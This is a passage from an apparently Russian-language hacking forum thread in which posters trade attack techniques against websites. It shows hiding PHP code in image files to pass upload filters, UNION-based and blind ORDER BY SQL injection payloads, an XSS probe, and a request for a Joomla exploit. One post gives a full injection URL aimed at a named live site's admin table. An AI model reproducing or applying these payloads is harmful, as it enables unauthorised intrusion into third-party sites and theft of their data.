Открываешь картинку любым текстовым редактором и в начало или конец вставляешь php код, как в обычный файл. Так же можно вставить код не в сам файл, а в метаданные. В случае жесткой фильтрации картинки, открываешь hex редактор и вставляешь код на место существующих значений.
Если ты делал как тебе сказали через хекс редактор, то картинка остаётся картинкой. скорее всего ты даже не попробовал так делать. http://dump.ru/file/4831477 вот тебе для теста пхпинфо. Пробуй заливать и инклудить.
Мне так и не помогли =) Ну ладно, сам разобрался. Ещё вопрос Есть скуля, ветка 5.1.43 В общем если пытаться вытянуть или посмотреть кол-во таблиц или колонок из information_schema, то сайт перестает грузиться, т.е. долго висит а потом тупо браузер говорит что не может открыть. Пробовал и локально и с дедиков и с хостов (скриптом) -1404+union+select+concat(database(),0x3A,version()),2+from+information_schema.tables--+ -1404+union+select+concat(column_name,0x3A,table_name),2+from+information_schema.columns--+ Если просто -1404+union+select+concat(database(),0x3A,version()),2--+ Версию и базу выводит, но при обращении к inf schema перестает грузится. Мож фильтруется from? В общем что посоветуете? Если интересно поковырять-ссылку дам в пм. Не игнорьте плз =)
Еще кто нибудь объясните, если в поле Логин я ввожу '';!--"<XSS>=&{()}, и потом просматириваю код страницы, и нахожу что то типа <XSS verses <()<, т.е. скобки остаются не измененные. Могу я их использовать для скрипта? Я где то читал, что это первый признак уязвимости.
Всем привет, Есть ли у кого эксплоит этой баги: http://developer.joomla.org/security/news/9-security/10-core-security/315-20100701-core-sql-injection-internal-path-exposure.html Буду очень благодарен!!
PHP: SELECT username FROM users ORDER BY username [URL] Is it possible to inject this? I know it is not possible to do union all select. site.php?orderby=ASC gives ascending and orderby=DESC gives descending. site.php?orderby=,password gives same as ASC site.php?orderby=limit 0,1 gives only first username. site.php?orderby=ASC, 1 gives true (everything ok on site) site.php?orderby=ASC, 0 gives false (content missing) orderby=ASC, 1=2 gives true (wtf?) Any help or way to inject this? Sorry for not speaking Russian!
Example, we have mysql5. Code: Exploit: site.php?orderby=%2A%28IF%28ASCII%28SUBSTRING%28VERSION%28%29%2C1%2C1%29%29%3D53%2C1%2C-1%29%29%0D%0A -> true site.php?orderby=%2A%28IF%28ASCII%28SUBSTRING%28VERSION%28%29%2C1%2C1%29%29%3D52%2C1%2C-1%29%29 -> false
Помогите раскрутить найденную уязвимость=) http://www.thegotomom.com/blog-post.php?id=118%20and%201=0%20union%20select%206661,%28select%20group_concat%28column_name%29%20from%20information_schema.columns%20where%20table_name%20=%200x61646d696e5f74626c%29,6663,6664,6665%20from%20admin_tbl--+ админку найте не могу... //здесь не помогают ломать =\ а помогают раскрутить найденную уязвимость
есть mssql inj структура таблицы: не получается вывести инфо из нее - на все запросы выдает: Invalid column name 'E-mail'. как обойти? и еще вопрос - как узнать количество записеи в табле?